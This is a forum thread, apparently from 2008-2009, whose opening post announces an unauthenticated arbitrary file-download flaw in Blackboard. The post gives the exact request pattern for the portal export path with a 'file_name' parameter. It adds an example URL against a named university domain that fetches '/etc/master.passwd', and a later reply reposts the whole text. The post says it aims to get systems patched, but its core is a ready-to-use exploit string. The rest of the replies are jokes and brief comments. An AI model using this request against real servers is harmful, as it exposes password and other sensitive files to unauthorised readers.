Have you seen this yet... huge Blackboard exploit.A newly discovered exploit of Blackboard allows unauthenticated users to request literally any file on a web server that is running Blackboard. Small universities and other educational centers that run multiple applications on a single web server are especially vulnerable. The Blackboard program must be upgraded immediately; however, Blackboard, Inc is refusing to acknowledge the severity of the problem.While the security hole is not being disclosed by the company, I believe it is so scary that the community must be made aware of it so that every single last Blackboard system is patched.Here is the exploit: <a class="user" href="http://&lt;your" rel="nofollow">http://&lt;your</a> Blackboard URL>/webapps/portal/export/<filename_to_save_locally>?file_name=<path to any file on the web server you want>or over SSL:<a class="user" href="https://&lt;your" rel="nofollow">https://&lt;your</a> Blackboard URL>/webapps/portal/export/<filename_to_save_locally>?file_name=<path to any file on the web server you want>A nonworking example for unix based systems to request the password file from a fake Harvard Blackboard installation would look like this:<a class="user" href="https://blackboard.harvard.edu/webapps/portal/export/ScaryStuff.txt?file_name=/etc/master.passwd" rel="nofollow">https://blackboard.harvard.edu/webapps/portal/expo ...</a>In layman’s terms, the server will then prompt you to save a file called ScaryStuff.txt(?) that contains all the information from the master password file specified at the end of the string. If you are familiar with Blackboard you can obtain almost anything from these servers.
nitroy2kSep 30, 2008
THIS IS REALYYYYYY EXELENT
morfineOct 1, 2008
f**k you, two of my friends died from blackboard fights!!
Closed AccountOct 1, 2008
Oh, oh, oh! Ohhhh, your helmet is so big!
rgjigsawOct 2, 2008
Starwars nerds
jmahorneyOct 3, 2008
totally awesome!
alexwebster171Nov 28, 2008
Straight up stupid. Not clever AND it's old news. Gaddamn.
rsmith5932Sep 4, 2009
Have you seen this yet... huge Blackboard exploit.A newly discovered exploit of Blackboard allows unauthenticated users to request literally any file on a web server that is running Blackboard. Small universities and other educational centers that run multiple applications on a single web server are especially vulnerable. The Blackboard program must be upgraded immediately; however, Blackboard, Inc is refusing to acknowledge the severity of the problem.While the security hole is not being disclosed by the company, I believe it is so scary that the community must be made aware of it so that every single last Blackboard system is patched.Here is the exploit: <a class="user" href="http://&lt;your" rel="nofollow">http://&lt;your</a> Blackboard URL>/webapps/portal/export/<filename_to_save_locally>?file_name=<path to any file on the web server you want>or over SSL:<a class="user" href="https://&lt;your" rel="nofollow">https://&lt;your</a> Blackboard URL>/webapps/portal/export/<filename_to_save_locally>?file_name=<path to any file on the web server you want>A nonworking example for unix based systems to request the password file from a fake Harvard Blackboard installation would look like this:<a class="user" href="https://blackboard.harvard.edu/webapps/portal/export/ScaryStuff.txt?file_name=/etc/master.passwd" rel="nofollow">https://blackboard.harvard.edu/webapps/portal/expo ...</a>In layman’s terms, the server will then prompt you to save a file called ScaryStuff.txt(?) that contains all the information from the master password file specified at the end of the string. If you are familiar with Blackboard you can obtain almost anything from these servers.